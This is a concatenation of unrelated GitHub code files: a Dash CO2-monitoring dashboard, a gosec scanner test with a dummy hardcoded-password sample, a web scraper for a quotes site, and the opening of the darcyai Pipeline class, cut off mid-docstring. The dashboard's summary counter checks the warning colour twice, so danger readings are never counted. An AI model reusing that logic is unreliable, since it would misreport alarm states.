dev_recent_measurements\n if x:\n current_value = y[-1]\n color = color_from_value(current_value, x[-1])\n\n # if reference_value is None:\n # current_value_str = f\"{current_value}\"\n # else:\n # current_value_str = f\"{current_value - reference_value:+}\"\n\n fig = go.Figure(\n {\n \"data\": [\n {\n \"x\": list(x),\n \"y\": list(y),\n \"mode\": \"lines\",\n \"name\": f\"sparkline-line-{serial_number}-id\",\n \"line\": {\"color\": \"#888\", \"width\": 3},\n }\n ],\n \"layout\": SPARKLINE_LAYOUT,\n }\n )\n else:\n current_value = \"s/d\"\n color = COLORS.OFFLINE\n fig = go.Figure(\n {\n \"layout\": SPARKLINE_LAYOUT,\n }\n )\n\n xmax = arrow.utcnow().float_timestamp\n xmin = xmax - config.DISPLAY_LEN_SEC\n fig.update_layout(xaxis_range=[xmin, xmax], yaxis_range=[0, 1200])\n\n fig.add_hline(\n config.RANGES.OK,\n line_dash=\"dot\",\n line_width=1,\n line_color=COLORS.OK,\n )\n fig.add_hline(\n config.RANGES.WARNING,\n line_dash=\"dot\",\n line_width=1,\n line_color=COLORS.WARNING,\n )\n fig.add_hline(\n config.RANGES.DANGER,\n line_dash=\"dot\",\n line_width=1,\n line_color=COLORS.DANGER,\n )\n\n return html.Div(\n className=\"grid-item \" + buildings[building],\n children=[\n html.Div(\n id=f\"header-{serial_number}-id\",\n className=\"header\",\n children=[\n daq.Indicator(\n id=f\"indicator-{serial_number}-id\",\n value=True,\n color=color,\n size=12,\n style={\"margin\": \"5px\", \"float\": \"right\"},\n ),\n box_title,\n ],\n ),\n html.Div(\n id=f\"mainbody-{serial_number}-id\",\n className=\"mainbody\",\n children=[\n dcc.Graph(\n id=f\"sparkline-{serial_number}-id\",\n className=\"sparkline-graph\",\n config={\n \"staticPlot\": False,\n \"editable\": False,\n \"displayModeBar\": False,\n },\n figure=fig,\n ),\n html.Div(\n id=f\"bigvalue-{serial_number}-id\",\n className=\"bigvalue\",\n children=f\"{current_value}\",\n style={\"color\": color},\n ),\n html.Div(\n id=f\"bigvalue-delta-{serial_number}-id\",\n className=\"bigvalue-delta\",\n children=f\"Δ {current_value - reference_value} \"\n f\"({ref_serial_no})\",\n style={\"color\": color},\n )\n if ref_serial_no is not None\n else None,\n ],\n ),\n html.Div(\n id=f\"footer-{serial_number}-id\",\n className=\"footer\",\n children=dcc.Link(\n href=f\"/admin/device/details/?id={devid}\",\n children=f\"Nivel {floor} - {building} \"\n f\"(s/n {serial_number})\",\n target=\"_blank\",\n className=\"footer\",\n ),\n ),\n ],\n )\n\n\ndef build_app(**kwargs):\n\n dash_app = dash.Dash(\n __name__,\n meta_tags=[\n {\n \"name\": \"viewport\",\n \"content\": \"width=device-width, initial-scale=1\",\n }\n ],\n **kwargs,\n )\n\n @dash_app.callback(\n [\n Output(\"devices\", \"data\"),\n Output(\"buildings\", \"data\"),\n Output(\"filter-buildings\", \"options\"),\n ],\n [Input(\"interval-component-devices\", \"n_intervals\")],\n )\n def update_dbb(interval_value):\n return models.load_devices()\n\n @dash_app.callback(\n [\n Output(\"recent-measurements\", \"data\"),\n Output(\"last-update\", \"data\"),\n ],\n [\n Input(\"devices\", \"data\"),\n Input(\"interval-component-records\", \"n_intervals\"),\n ],\n )\n def update_recent_measurements(devices, interval_value):\n out = {}\n for dev in devices:\n serial_number = dev[\"serial_number\"]\n out[str(serial_number)] = models.get_values(\n serial_number, -config.DISPLAY_LEN_SEC, 5000\n )\n return out, arrow.now(config.TIMEZONE).format(\n \"YYYY-MM-DD HH:mm:ss\"\n )\n\n @dash_app.callback(\n Output(\"summary-count\", \"data\"),\n Input(\"recent-measurements\", \"data\"),\n )\n def update_summary_count(recent_measurements):\n cnt_ok = cnt_warning = cnt_danger = cnt_offline = 0\n for k, (x, y) in recent_measurements.items():\n if not x:\n cnt_offline += 1\n continue\n\n col = color_from_value(y[-1], x[-1])\n if col == COLORS.OK:\n cnt_ok += 1\n elif col == COLORS.WARNING:\n cnt_warning += 1\n elif col == COLORS.WARNING:\n cnt_danger += 1\n elif col == COLORS.OFFLINE:\n cnt_offline += 1\n\n return cnt_ok, cnt_warning, cnt_danger, cnt_offline\n\n @dash_app.callback(\n Output(\"grid-content\", \"children\"),\n Input(\"devices\", \"data\"),\n Input(\"recent-measurements\", \"data\"),\n Input(\"buildings\", \"data\"),\n Input(\"view-options\", \"value\"),\n )\n def update_boxes(\n devices, recent_measurements, buildings, view_options\n ):\n out = []\n for dev in devices:\n out.append(\n build_box(\n dev,\n recent_measurements[str(dev[\"serial_number\"])],\n buildings,\n view_options,\n )\n )\n return out\n\n @dash_app.callback(\n Output(\"grid-content\", \"className\"),\n Input(\"view-options\", \"value\"),\n )\n def update_value_visibility(view_options):\n if \"view-values\" in view_options:\n return \"grid\"\n return \"grid hide-bigvalue\"\n\n @dash_app.callback(\n Output(\"banner-summary\", \"children\"),\n Input(\"last-update\", \"data\"),\n Input(\"summary-count\", \"data\"),\n )\n def update_banner_summary(last_update, summary_count):\n cnt_ok, cnt_warning, cnt_danger, cnt_offline = summary_count\n return [\n f\"{last_update}\",\n daq.Indicator(\n id=\"summary-ok\",\n value=True,\n color=COLORS.OK,\n size=12,\n className=\"indicator\",\n ),\n html.Div(\n className=\"row metric-row\",\n children=[\n f\"{cnt_ok:03d}\",\n daq.Indicator(\n id=\"summary-warning\",\n value=True,\n color=COLORS.WARNING,\n size=12,\n className=\"indicator\",\n ),\n f\"{cnt_warning:03d}\",\n daq.Indicator(\n id=\"summary-danger\",\n value=True,\n color=COLORS.DANGER,\n size=12,\n className=\"indicator\",\n ),\n f\"{cnt_danger:03d}\",\n daq.Indicator(\n id=\"summary-offline\",\n value=True,\n color=COLORS.OFFLINE,\n size=12,\n className=\"indicator\",\n ),\n f\"{cnt_offline:03d}\",\n ],\n ),\n ]\n\n dash_app.clientside_callback(\n \"\"\"\n function(filter_options) {\n query = filter_options.map(s => \".\" + s);\n query = query.reduce((a, s) => a + \", \" + s, \".building-filter-none\");\n if (document.iso === undefined) {\n return -1;\n };\n document.iso.arrange({ filter: query});\n return 0;\n }\n \"\"\",\n Output(\"n-interval-stage\", \"data\"),\n Input(\"filter-buildings\", \"value\"),\n )\n\n dash_app.clientside_callback(\n \"\"\"\n function(value) {\n var iso = new Isotope('.grid', {\n // options\n itemSelector: '.grid-item',\n layoutMode: 'fitRows'\n });\n\n document.iso = iso;\n return 1;\n }\n \"\"\",\n Output(\"trash\", \"data\"),\n Input(\"grid-content\", \"children\"),\n )\n\n @dash_app.callback(\n Output(\"filter-buildings\", \"value\"),\n Input(\"buildings\", \"data\"),\n Input(\"app-container\", \"children\"),\n )\n def check_all_boxes(buildings, _aux):\n return list(buildings.values())\n\n dash_app.layout = html.Div(\n id=\"big-app-container\",\n children=[\n build_banner(dash_app),\n build_header(),\n html.Div(\n id=\"app-container\",\n children=[\n # Main app\n html.Div(\n id=\"div-loading-spinner\",\n children=[\n html.Img(\n id=\"loading-spinner\",\n src=dash_app.get_asset_url(\n \"spinner.gif\"\n ),\n style={\n \"width\": \"50px\",\n \"height\": \"50px\",\n \"vertical-align\": \"middle\",\n \"display\": \"block\",\n \"margin-left\": \"auto\",\n \"margin-right\": \"auto\",\n \"margin-top\": \"100px\",\n },\n ),\n ],\n ),\n html.Div(\n id=\"app-content\",\n className=\"my-hide\",\n children=[\n html.Div(\n id=\"grid-content\",\n className=\"grid\",\n children=[],\n )\n ],\n ),\n ],\n ),\n dcc.Store(id=\"n-interval-stage\", data=0),\n dcc.Store(id=\"devices\", data=[]),\n dcc.Store(id=\"recent-measurements\", data={}),\n dcc.Store(id=\"last-update\", data=\"n/a\"),\n dcc.Store(id=\"buildings\", data=\"{}\"),\n dcc.Store(id=\"summary-count\", data=(0, 0, 0, 0)),\n dcc.Store(id=\"trash\", data=0),\n dcc.Interval(\n id=\"interval-component-records\",\n interval=3 * 60 * 1000, # in milliseconds\n n_intervals=50, # start at batch 50\n # disabled=False,\n ),\n dcc.Interval(\n id=\"interval-component-devices\",\n interval=10 * 60 * 1000, # in milliseconds\n n_intervals=50, # start at batch 50\n # disabled=False,\n ),\n ],\n )\n\n dash_app.title = \"Medición de CO2 / Exactas / UBA\"\n\n return dash_app\n","repo_name":"hgrecco/CO2-WiFi","sub_path":"dashCO2-web/dashCO2/dashapp.py","file_name":"dashapp.py","file_ext":"py","file_size_in_byte":16479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34059952243","text":"import os\nfrom pathlib import Path\n\nfrom bento.extra.gosec import GosecTool\nfrom bento.violation import Violation\nfrom tests.test_tool import context_for\n\nTHIS_PATH = Path(os.path.dirname(__file__))\nBASE_PATH = THIS_PATH / \"..\" / \"..\" / \"..\"\n\n\ndef test_run(tmp_path: Path) -> None:\n base_path = BASE_PATH / \"tests\" / \"integration\" / \"go\"\n tool = GosecTool(context_for(tmp_path, GosecTool.tool_id(), base_path))\n tool.setup()\n violations = tool.results([base_path / \"bad.go\"])\n assert violations == [\n Violation(\n tool_id=\"gosec\",\n check_id=\"G101\",\n path=\"bad.go\",\n line=7,\n column=2,\n message=\"Potential hardcoded credentials\",\n severity=2,\n syntactic_context='password := \"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\"\\n',\n filtered=None,\n link=\"https://cwe.mitre.org/data/definitions/798.html\",\n )\n ]\n\n\ndef test_file_selection(tmp_path: Path) -> None:\n base_path = BASE_PATH / \"tests\" / \"integration\" / \"go\"\n tool = GosecTool(context_for(tmp_path, GosecTool.tool_id(), base_path))\n tool.setup()\n violations = tool.results([base_path / \"ok.go\"])\n assert violations == []\n","repo_name":"returntocorp/bento","sub_path":"tests/extra/gosec/test_gosec.py","file_name":"test_gosec.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"35"} +{"seq_id":"8780349064","text":"# 爬取名言网的作者、名言、标签等信息\n# http://quotes.toscrape.com/\n# 方式二:bs4进行解析\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport csv\n# 1.模拟浏览器发送请求,返回一个响应对象(类似于文件对象)\nresponse=urlopen(\"http://quotes.toscrape.com/\")\n\n#2. 获得源码\n# 获得源码是字节类型,如果希望转换成字符串,需要调用decode()\nhtml=response.read().decode()\n# print(html)\n\n# 3. 使用bs4进行解析,获得需要的内容\n# (1)创建bs对象\nbs=BeautifulSoup(html,\"html.parser\") # \"html.parser\"指的是要解析什么类型文件\n# 思路:使用bs获取所有的名言、所有的作者、所有的关键字\n\n# 先获取所有的名言\n# bs.select(\"标签名.class属性值\")\nspans_quotes=bs.select(\"span.text\")\n# li_quotes=[]\n# for i in spans_quotes:\n# li_quotes.append(i.text)\nli_quotes=[i.text for i in spans_quotes]\n# print(li_quotes)\n\n# 获取所有的作者\nsmall_authors=bs.select(\"small.author\")\n# li_authors=[]\n# for i in small_authors:\n# li_authors.append(i.text)\nli_authors=[i.text for i in small_authors]\n\n#所有名言下的关键字\ntemp=bs.select(\"div.tags\")\n#bs.select获取的返回值,每一个元素可以继续调用select\n# select的每个元素对象之后,通过调用text属性,就可以获得标签中间夹的内容\nli_tags=[]\nfor i in temp:\n aes=i.select(\"a.tag\")\n # print(\"当前名言下的关键字\")\n tag_str=\"\"\n for j in aes:\n # print(j.text)\n tag_str+=str(j.text)+\",\"\n # print(tag_str)\n li_tags.append(tag_str)\n\n\n#组合\nwith open(\"c:/quotes3.csv\",\"wt\",newline=\"\") as f:\n writer=csv.writer(f)\n writer.writerow([\"名言\",\"作者\",\"关键字标签\"])\n for i in range(len(spans_quotes)):\n one=[li_quotes[i],li_authors[i],li_tags[i]]\n # print(one)\n writer.writerow(one)","repo_name":"github19970909/python1902","sub_path":"day10/day9homework3.py","file_name":"day9homework3.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36940320768","text":"import json\nimport os\nimport pathlib\nimport platform\nimport sys\nimport threading\nimport time\nfrom collections import OrderedDict\nfrom collections.abc import Iterable\nfrom flask import Flask, request, Response, jsonify, render_template\nfrom json import JSONEncoder\nfrom multiprocessing.pool import ThreadPool\nfrom signal import SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM, signal\nfrom typing import Callable, Any, Dict, Tuple, Union, List\nfrom unittest.mock import sentinel\nfrom waitress import serve\n\nfrom darcyai.config import Config, RGB\nfrom darcyai.config_registry import ConfigRegistry\nfrom darcyai.cyclic_toposort import acyclic_toposort\nfrom darcyai.input.input_multi_stream import InputMultiStream\nfrom darcyai.input.input_stream import InputStream\nfrom darcyai.log import setup_custom_logger\nfrom darcyai.output.output_stream import OutputStream\nfrom darcyai.perceptor.perceptor import Perceptor\nfrom darcyai.perceptor.perceptor_node import PerceptorNode\nfrom darcyai.perception_object_model import PerceptionObjectModel\nfrom darcyai.processing_engine import ProcessingEngine\nfrom darcyai.stream_data import StreamData\nfrom darcyai.utils import validate_not_none, validate_type, validate\n\n\nclass Pipeline():\n \"\"\"\n The Pipeline class is the main class of the darcyai package.\n\n # Arguments\n input_stream (InputStream): The input stream to be used by the pipeline.\n input_data_history_len (int): The number of input data items to be\n stored in the history. Defaults to `1`.\n pom_history_len (int): The number of POM items to be stored in the\n history. Defaults to `1`.\n metrics_history_len (int): The number of metrics items to be stored in\n the history. Defaults to `1`.\n num_of_edge_tpus (int): The number of Edge TPUs. Defaults to `1`.\n perceptor_error_handler_callback (Callable[[str, Exception], None]): The\n callback function to be called when a Perceptor throws\n an exception. Defaults to `None`.\n output_stream_error_handler_callback (Callable[[str, Exception], None]): The\n callback function to be called when an OutputStream\n throws an exception. Defaults to `None`.\n input_stream_error_handler_callback (Callable[[Exception], None]): The\n callback function to be called when an InputStream throws\n an exception. Defaults to `None`.\n perception_completion_callback (Callable[[PerceptionObjectModel], None]): The\n callback function to be called when all the perceptors have completed\n processing. Defaults to `None`.\n universal_rest_api (bool): Whether or not to use the universal\n REST API. Defaults to `False`.\n rest_api_base_path (str): The base path of the REST API. Defaults to `/`.\n rest_api_flask_app (Flask): The Flask application to be used by\n the REST API. Defaults to `None`.\n rest_api_port (int): The port of the REST API. Defaults to `5000`.\n rest_api_host (str): The host of the REST API. Defaults to `localhost`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera,\n ... input_data_history_len=10,\n ... pom_history_len=10,\n ... metrics_history_len=10,\n ... num_of_edge_tpus=1,\n ... perceptor_error_handler_callback=None,\n ... output_stream_error_handler_callback=None,\n ... input_stream_error_handler_callback=None,\n ... perception_completion_callback=None,\n ... pulse_completion_callback=None,\n ... universal_rest_api=True,\n ... rest_api_base_path=\"/\",\n ... rest_api_flask_app=None,\n ... rest_api_port=5000,\n ... rest_api_host=\"localhost\")\n ```\n \"\"\"\n def __init__(self,\n input_stream: InputStream,\n input_data_history_len: int = 50,\n pom_history_len: int = 50,\n metrics_history_len: int = 50,\n num_of_edge_tpus: int = 1,\n perceptor_error_handler_callback: Callable[[str, Exception], None] = None,\n output_stream_error_handler_callback: Callable[[str, Exception], None] = None,\n input_stream_error_handler_callback: Callable[[Exception], None] = None,\n perception_completion_callback: Callable[[PerceptionObjectModel], None] = None,\n pulse_completion_callback: Callable[[PerceptionObjectModel], None] = None,\n universal_rest_api: bool = False,\n rest_api_base_path: str = None,\n rest_api_flask_app: Flask = None,\n rest_api_port: int = None,\n rest_api_host: str = None):\n validate_not_none(input_stream, \"input_stream is required\")\n validate_type(input_stream, (InputStream, InputMultiStream),\n \"input_stream must be an instance of InputStream\")\n\n validate_type(\n num_of_edge_tpus,\n int,\n \"num_of_edge_tpus must be an integer\")\n validate(\n num_of_edge_tpus > 0,\n \"num_of_edge_tpus must be greater then 0\")\n\n if perceptor_error_handler_callback is not None:\n validate(callable(perceptor_error_handler_callback),\n \"perceptor_error_handler_callback must be a function\")\n\n if output_stream_error_handler_callback is not None:\n validate(callable(output_stream_error_handler_callback),\n \"output_stream_error_handler_callback must be a function\")\n\n if input_stream_error_handler_callback is not None:\n validate(callable(input_stream_error_handler_callback),\n \"input_stream_error_handler_callback must be a function\")\n\n self.__set_perception_completion_callback(perception_completion_callback)\n\n if pulse_completion_callback is not None:\n validate(callable(pulse_completion_callback),\n \"pulse_completion_callback must be a function\")\n self.__pulse_completion_callback = pulse_completion_callback\n\n if universal_rest_api:\n if rest_api_flask_app is not None:\n validate_type(\n rest_api_flask_app,\n Flask,\n \"rest_api_flask_app must be of type Flask\")\n else:\n validate_not_none(rest_api_port, \"rest_api_port is required\")\n validate_type(\n rest_api_port,\n int,\n \"rest_api_port must be of type int\")\n validate(\n 0 <= rest_api_port <= 65535,\n \"rest_api_port must be between 0 and 65535\")\n\n if rest_api_host is None:\n self.__host = \"*\"\n else:\n validate_type(\n rest_api_host,\n str,\n \"rest_api_host must be a string\")\n self.__host = rest_api_host\n\n validate_not_none(\n rest_api_base_path,\n \"rest_api_base_path is required\")\n validate_type(\n rest_api_base_path,\n str,\n \"rest_api_base_path must be a string\")\n\n self.__flask_app = rest_api_flask_app\n self.__port = rest_api_port\n self.__path = rest_api_base_path\n\n self.__input_stream = input_stream\n\n self.__num_of_edge_tpus = num_of_edge_tpus\n\n self.__input_data_history_len = input_data_history_len\n self.__input_data_history = OrderedDict()\n\n self.__pom_history_len = pom_history_len\n self.__pom_history = OrderedDict()\n\n self.__metrics_history = OrderedDict()\n self.__metrics_history_len = metrics_history_len\n self.__average_pipeline_cycle_execution = 0\n self.__average_perceptor_execution = {}\n self.__perceptors_execution_time = {}\n\n self.__perceptor_error_handler_callback = perceptor_error_handler_callback\n self.__output_stream_error_handler_callback = output_stream_error_handler_callback\n self.__input_stream_error_handler_callback = input_stream_error_handler_callback\n\n self.__perceptors = {}\n self.__output_streams = {}\n self.__processing_engine = ProcessingEngine(self.__num_of_edge_tpus)\n self.__thread_pool = ThreadPool(10)\n self.__pom = PerceptionObjectModel()\n self.__pulse_number = 0\n self.__perceptor_config_registry = {}\n self.__perceptor_config_schema = {}\n self.__output_config_registry = {}\n self.__output_config_schema = {}\n self.__logger = setup_custom_logger(__name__)\n\n self.__running = False\n\n if universal_rest_api:\n threading.Thread(target=self.__start_api_server).start()\n\n signals = [SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM]\n #pylint: disable=import-outside-toplevel\n if platform.system() == \"Windows\":\n from signal import SIGBREAK\n signals.append(SIGBREAK)\n else:\n from signal import SIGQUIT\n signals.append(SIGQUIT)\n for sig in signals:\n signal(sig, self.__kill)\n\n def num_of_edge_tpus(self) -> int:\n \"\"\"\n Gets the number of Edge TPUs in the pipeline.\n\n # Returns\n int: The number of Edge TPUs in the pipeline.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.num_of_edge_tpus()\n ```\n \"\"\"\n return self.__num_of_edge_tpus\n\n def add_perceptor(self,\n name: str,\n perceptor: Perceptor,\n input_callback: Callable[[StreamData,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n output_callback: Callable[[Any,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n parent: str = None,\n multi: bool = False,\n accelerator_idx: int = 0,\n default_config: Dict[str, Any] = None) -> None:\n \"\"\"\n Adds a new Perceptor to the pipeline.\n\n # Arguments\n name (str): The name of the Perceptor (must be a valid variable name).\n perceptor (Perceptor): The Perceptor to be added.\n input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor receives input data.\n Defaults to `None`.\n output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor produces output data.\n Defaults to `None`.\n parent (str): The name of the parent Perceptor. Defaults to `None`.\n multi (bool): Whether or not to run the perceptor for each item in input data.\n Defaults to `False`.\n accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.\n Defaults to `0`.\n default_config (Dict[str, Any]): The default configuration for the Perceptor.\n Defaults to `None`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.add_perceptor(name=\"perceptor\",\n ... perceptor=MyPerceptor(),\n ... input_callback=None,\n ... output_callback=None,\n ... parent=\"input_stream\",\n ... multi=True,\n ... accelerator_idx=0,\n ... default_config={\"key\": \"value\"})\n ```\n \"\"\"\n self.__logger.debug(\"Adding Perceptor '%s' to Pipeline\", name)\n\n self.__validate_perceptor(\n name=name,\n perceptor=perceptor,\n input_callback=input_callback,\n output_callback=output_callback,\n accelerator_idx=accelerator_idx,\n default_config=default_config)\n\n if parent is not None and parent not in self.__perceptors:\n raise ValueError(\n f\"perceptor with name '{parent}' does not exist\")\n\n perceptor_node = PerceptorNode(\n name,\n perceptor,\n input_callback,\n output_callback,\n multi,\n accelerator_idx)\n\n self.__perceptors[name] = perceptor_node\n if parent is not None:\n self.__perceptors[parent].add_child_perceptor(name)\n\n self.__create_config_registry_for_perceptor(\n name, perceptor, default_config)\n\n def add_perceptor_before(self,\n name_to_insert_before: str,\n name: str,\n perceptor: Perceptor,\n input_callback: Callable[[StreamData,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n output_callback: Callable[[Any,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n multi: bool = False,\n accelerator_idx: int = 0,\n default_config: dict = None) -> None:\n \"\"\"\n Adds a new Perceptor to the pipeline.\n\n # Arguments\n name_to_insert_before (str): The name of the Perceptor to insert the new Perceptor\n before.\n name (str): The name of the Perceptor.\n perceptor (Perceptor): The Perceptor to be added.\n input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor receives input data.\n Defaults to `None`.\n output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor produces output data.\n Defaults to `None`.\n multi (bool): Whether or not to run the perceptor for each item in input data.\n Defaults to `False`.\n accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.\n Defaults to `0`.\n default_config (dict): The default configuration for the Perceptor.\n Defaults to `None`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.add_perceptor_before(name=\"perceptor\",\n ... name_to_insert_before=\"child_input_stream\",\n ... perceptor=MyPerceptor(),\n ... input_callback=None,\n ... output_callback=None,\n ... multi=True,\n ... accelerator_idx=0,\n ... default_config={\"key\": \"value\"})\n ```\n \"\"\"\n self.__logger.debug(\"Adding Perceptor '%s' to Pipeline\", name)\n\n self.__validate_perceptor(\n name=name,\n perceptor=perceptor,\n input_callback=input_callback,\n output_callback=output_callback,\n accelerator_idx=accelerator_idx,\n default_config=default_config)\n\n validate_not_none(\n name_to_insert_before,\n \"name_to_insert_before is required\")\n validate_type(\n name_to_insert_before,\n str,\n \"name_to_insert_before must be a string\")\n validate(\n name_to_insert_before in self.__perceptors,\n f\"perceptor with name '{name_to_insert_before}' does not exist\")\n validate(name_to_insert_before != name,\n \"name_to_insert_before cannot be the same as name\")\n\n perceptor_node = PerceptorNode(\n name,\n perceptor,\n input_callback,\n output_callback,\n multi,\n accelerator_idx)\n\n self.__perceptors[name] = perceptor_node\n\n parents = self.__get_perceptor_parents(name_to_insert_before)\n for parent in parents:\n self.__perceptors[parent].add_child_perceptor(name)\n self.__perceptors[parent].remove_child_perceptor(\n name_to_insert_before)\n\n self.__perceptors[name].add_child_perceptor(name_to_insert_before)\n\n self.__create_config_registry_for_perceptor(\n name, perceptor, default_config)\n\n def add_perceptor_after(self,\n name_to_insert_after: str,\n name: str,\n perceptor: Perceptor,\n input_callback: Callable[[StreamData,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n output_callback: Callable[[Any,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n multi: bool = False,\n accelerator_idx: int = 0,\n default_config: dict = None) -> None:\n \"\"\"\n Adds a new Perceptor to the pipeline.\n\n # Arguments\n name_to_insert_after (str): The name of the Perceptor to insert the new Perceptor\n after.\n name (str): The name of the Perceptor.\n perceptor (Perceptor): The Perceptor to be added.\n input_callback (Callable[[StreamData, PerceptionObjectModel, Any], ConfigRegistry]): The\n callback function to be called when the Perceptor receives input data.\n Defaults to `None`.\n output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor produces output data.\n Defaults to `None`.\n multi (bool): Whether or not to run the perceptor for each item in input data.\n Defaults to `False`.\n accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.\n Defaults to `0`.\n default_config (dict): The default configuration for the Perceptor.\n Defaults to `None`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.add_perceptor_after(name=\"perceptor\",\n ... name_to_insert_after=\"parent_input_stream\",\n ... perceptor=MyPerceptor(),\n ... input_callback=None,\n ... output_callback=None,\n ... multi=True,\n ... accelerator_idx=0,\n ... default_config={\"key\": \"value\"})\n ```\n \"\"\"\n self.add_perceptor(\n name=name,\n perceptor=perceptor,\n input_callback=input_callback,\n output_callback=output_callback,\n parent=name_to_insert_after,\n multi=multi,\n accelerator_idx=accelerator_idx,\n default_config=default_config)\n\n def add_parallel_perceptor(self,\n name_to_insert_in_parallel_with: str,\n name: str,\n perceptor: Perceptor,\n input_callback: Callable[[StreamData,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n output_callback: Callable[[Any,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n multi: bool = False,\n accelerator_idx: int = 0,\n default_config: dict = None) -> None:\n \"\"\"\n Adds a new Perceptor to the pipeline.\n\n # Arguments\n name_to_insert_in_parallel_with (str): The name of the Perceptor to insert the\n new Perceptor in parallel with.\n name (str): The name of the Perceptor.\n perceptor (Perceptor): The Perceptor to be added.\n input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor receives input data.\n Defaults to `None`.\n output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor produces output data.\n Defaults to `None`.\n multi (bool): Whether or not to run the perceptor for each item in input data.\n Defaults to `False`.\n accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.\n Defaults to `None`.\n default_config (dict): The default configuration for the Perceptor.\n Defaults to `None`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.add_parallel_perceptor(name=\"perceptor\",\n ... name_to_insert_in_parallel_with=\"parallel_input_stream\",\n ... perceptor=MyPerceptor(),\n ... input_callback=None,\n ... output_callback=None,\n ... multi=True,\n ... accelerator_idx=0,\n ... default_config={\"key\": \"value\"})\n ```\n \"\"\"\n self.__logger.debug(\"Adding Perceptor '%s' to Pipeline\", name)\n\n self.__validate_perceptor(\n name=name,\n perceptor=perceptor,\n input_callback=input_callback,\n output_callback=output_callback,\n accelerator_idx=accelerator_idx,\n default_config=default_config)\n\n validate_not_none(\n name_to_insert_in_parallel_with,\n \"name_to_insert_in_parallel_with is required\")\n validate_type(name_to_insert_in_parallel_with, str,\n \"name_to_insert_in_parallel_with must be a string\")\n validate(\n name_to_insert_in_parallel_with in self.__perceptors,\n f\"perceptor with name '{name_to_insert_in_parallel_with}'\" + \\\n \"does not exist\")\n validate(name_to_insert_in_parallel_with != name,\n \"name_to_insert_in_parallel_with cannot be the same as name\")\n\n perceptor_node = PerceptorNode(\n name,\n perceptor,\n input_callback,\n output_callback,\n multi,\n accelerator_idx)\n\n self.__perceptors[name] = perceptor_node\n\n parents = self.__get_perceptor_parents(name_to_insert_in_parallel_with)\n for parent in parents:\n self.__perceptors[parent].add_child_perceptor(name)\n\n self.__create_config_registry_for_perceptor(\n name, perceptor, default_config)\n\n def update_input_stream(self, input_stream: InputStream) -> None:\n \"\"\"\n Updates the input stream of the pipeline.\n\n # Arguments\n input_stream (InputStream): The input stream to be added.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.update_input_stream(camera)\n \"\"\"\n self.__logger.debug(\"Adding Input Stream of type '%s' to Pipeline\",\n input_stream.__class__.__name__)\n\n validate_not_none(input_stream, \"input_stream is required\")\n validate_type(input_stream, InputStream, \"input_stream must be an InputStream\")\n\n if self.__running:\n raise RuntimeError(\"Pipeline is already running\")\n\n self.__input_stream = input_stream\n\n def add_output_stream(self,\n name: str,\n callback: Callable[[PerceptionObjectModel,\n StreamData],\n Any],\n output_stream: OutputStream,\n default_config: dict = None) -> None:\n \"\"\"\n Adds an OutputStream to the pipeline.\n\n # Arguments\n name (str): The name of the OutputStream.\n callback (Callable[[PerceptionObjectModel, StreamData], Any]): A callback function\n that is called whith PerceptionObjectModel object 